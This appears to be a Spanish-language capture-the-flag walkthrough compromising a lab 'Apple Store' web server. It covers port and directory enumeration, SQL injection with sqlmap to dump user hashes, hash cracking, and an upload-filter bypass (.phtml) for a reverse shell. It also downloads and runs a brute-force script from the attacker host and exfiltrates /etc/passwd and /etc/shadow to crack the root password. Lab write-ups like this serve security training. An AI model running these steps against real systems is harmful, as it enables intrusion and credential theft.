# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script 'vuln' --open --min-rate 5000 -vvv 172.17.0.2 -oN nmap

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
	| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-enum: 
|   /login.php: Possible admin folder
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)'
|   /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)'
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)'
|     Path: http://172.17.0.2:80/profile.php
|     Form id: username
|     Form action:
|     Path: http://172.17.0.2:80/login.php
|     Form id: username
|_    Form action:

Ya aqui podemos ver varios directorios:

http://172.17.0.2:80/profile.php
http://172.17.0.2:80/login.php

# Fuzzing Web

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 5013]
/img                  (Status: 301) [Size: 306] [--> http://172.17.0.2/img/]
/login.php            (Status: 200) [Size: 1619]
/register.php         (Status: 200) [Size: 1607]
/profile.php          (Status: 302) [Size: 0] [--> login.php]
/uploads              (Status: 301) [Size: 310] [--> http://172.17.0.2/uploads/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/vendor               (Status: 301) [Size: 309] [--> http://172.17.0.2/vendor/]
/mycart.php           (Status: 302) [Size: 0] [--> login.php]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
/profile2.php         (Status: 302) [Size: 0] [--> login.php]
Progress: 1661144 / 1661152 (100.00%)
===============================================================



al chequear el servicio web, nos conseguimos con una tienda de Apple Store, revisando la web a priori no consigo nada, pruebo una inyeccion 
sql en la barra del buscardor de productos pero no es inyectable, al revisar en http://172.17.0.2/login.ph pense en un ataque por diccionario 
pero no tengo ningun usuario, asi que intento registrarme y al acceder aparece mi perfil de usuario donde puedo ver: ID de Usuario: 4
por lo que deben existir mas usuarios, revisando mas, en la seccion de >>> Mi Carrito <<< nos volvemos a encontrar con una barra de buscardor
de productos, intencto una inyeccion sql ('1=1-- -) y esta vez la web respode diferente (se queda totaalmente en blanco), asi que es hora de usar sqlmap

# SQLMAP

ya que al hacer la prueba de '1=1 -- - el comportamiento de la web fue diferente al primer intento de inyeccion en la pagina princial
procedemos a capturar una peticion con burpsuite

Peticion capturada:
---------------------------------------------------------------------------------------------------
GET /mycart.php?search=mac HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=j0t4ck4a90enik1idirua3qfh7
Upgrade-Insecure-Requests: 1
----------------------------------------------------------------------------------------------------
la guardamos en un archivo (en mi caso: peticion) y se la pasamos a sqlmap

sqlmap -r peticion --batch --dbs

available databases [5]:
[*] apple_store
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

tenemos 5 bases de datos, asi que iremos dumpeando la informacion para ver que conseguimos

database: apple_store

sqlmap -r peticion -D apple_store --tables --batch			| dumpeamos las tablas de la db apple_store

Database: apple_store
[2 tables]
+-----------+
| productos |
| users     |
+-----------+

sqlmap -r peticion -D apple_store -T users --columns --batch		| dumpeamos las columnas de la tabla users en la db apple_store

Database: apple_store
Table: users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

sqlmap -r peticion -D apple_store -T users -C id,password,username --dump --batch 

Database: apple_store                                                                                                                                                  
Table: users
[4 entries]
+----+-------------------------------------------------+------------+
| id | password                                        | username   |
+----+-------------------------------------------------+------------+
| 1  | 761bb015d7254610f89d9a7b6b152f1df2027e0a        | luisillo   |
| 2  | 7f73ae7a9823a66efcddd10445804f7d124cd8b0        | admin      |
| 3  | a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (test) | test       |
| 4  | 7110eda4d09e062aa5e4a390b0a572ac0d2c0220 (1234) | darksblack |
+----+-------------------------------------------------+------------+

hemos dumpeado las columnas id, password y username de la tabla users de la db apple_store
(el ultimo usuario [darksblack fue el que yo registre])

intente crackear los hash con john pero sin resultados, asi que ahora intentemos con hashcat

# hashcat

hashcat --show 7f73ae7a9823a66efcddd10445804f7d124cd8b0				| para identidicar el tipo de hash

      # | Name                                                       | Category
  ======+============================================================+======================================
    100 | SHA1                                                       | Raw Hash
   6000 | RIPEMD-160                                                 | Raw Hash
    170 | sha1(utf16le($pass))                                       | Raw Hash
   4700 | sha1(md5($pass))                                           | Raw Hash salted and/or iterated
  18500 | sha1(md5(md5($pass)))                                      | Raw Hash salted and/or iterated
   4500 | sha1(sha1($pass))                                          | Raw Hash salted and/or iterated
    300 | MySQL4.1/MySQL5                                            | Database Server

intentamos con el primero >> SHA1: 100

hashcat -m 100 -a 0 7f73ae7a9823a66efcddd10445804f7d124cd8b0 /home/darks/Desktop/Kali/diccionarios/rockyou.txt

7f73ae7a9823a66efcddd10445804f7d124cd8b0:0844575632       

la password del usuario admin es: 0844575632, asi que accedemos a su cuenta en el servicio web y tras acceder vemos al
final del todo >>> Ir al Panel Administrativo

ahora en el panel administrativo vemos un menu lateral que tras ir probando, accedimos a >>> configuracion
y vemos que podemos subir archivos, y como la web interpreta codigo php y tenemos un directorio http://172.17.0.2/uploads/
vamos a cargar una reverse shell y visitar el directorio /uploads a ver si se carga alli...

despues de intentar cargar el archivo php, nos arroja el sigueinte mensaje: Archivo no permitido. Tipo de archivo potencialmente peligroso.
asi que cambio la extension .php por .module y carga exitosamente, pero no lo interpreta asi que sigo probando con mas extensiones

despues de un rato cambiando y cambiando extensiones, la que puede cargar fue .phtml
asi que me coloco en escucha con netcat y llamo al archivo cargado, >>> Logramos acceso al Sistema <<<

nota: la reverse shell que use la pueden conseguir en: https://github.com/DarksBlackSk/reverse/blob/main/php-reverse-shell.php
  
# Escalada Privilegios

tratamiento de la bash:

script /dev/null -c bash
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash

cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
luisillo_o:x:1001:1001::/home/luisillo_o:/bin/sh

despues de mucho rato revisando el sistema no veo manera de escalar asi
que vamos intentar hacer un ataque de diccionario contra el usuario luisillo_o


------------------------------------
desde nuestra maquina atacante:
python3 -m http.server 80
------------------------------------

ahora nos bajamos un script para el ataque y el diccionario rockyou
desde la maquina vulnerada

wget http://172.17.0.1/Linux-Su-Force.sh
wget http://172.17.0.1/rockyou.txt
chmod +x Linux-Su-Force.sh
./Linux-Su-Force.sh luisillo_o rockyou.txt
Contraseña encontrada para el usuario luisillo_o: 19831983
su luisillo_o
passwd: 19831983
$ sudo -l
Sorry, user luisillo_o may not run sudo on 27be010211ec.
$ find / -perm -4000 2>/dev/null				| nada por aca

buscamos en el sistema una y mil formas pero nada paara escalar, despues de chequear los
grupos a los que pertenecemos tenemos mas luz de como poder llegar a escarlar:

id
uid=1001(luisillo_o) gid=1001(luisillo_o) groups=1001(luisillo_o),42(shadow)

ls -la /etc/shadow
-rw-r----- 1 root shadow 720 Sep  3 19:26 /etc/shadow

como podemos ver, tenemos permiso de lectura sobre el archivo /etc/shadow
este archivo contine las passwd de los usuarios del sistema, pero obvio que 
encriptadas, asi que vamos a necesitar el contenido de /etc/shadow y etc/passwd

cat /etc/passwd > passwd
cat /etc/shadow > shadow
python3 -m http.server 6000

hemos creado 2 archivos identicos a los que necesitamos pero en nuestro directorio
despues nos levantamos un servidor python para descargar los archivos desde nuestra
maquina atacante
---------------------------------------------------------------------------------------
			desde la maquina atacante:

curl -O http://172.17.0.2:6000/passwd			| archivo 1 descargado
curl -O http://172.17.0.2:6000/shadow			| archivo 2 descargado
unshadow passwd shadow > hash				| fucionamos ambos archivos descargados

john --wordlist=/home/darks/Desktop/Kali/diccionarios/rockyou.txt hash --format=crypt
19831983         (luisillo_o)     
rainbow2         (root) 

hemos descifrado la password de root asi que ahora elevamos privilegios
----------------------------------------------------------------------------------------

su root
passwd: rainbow2
#root
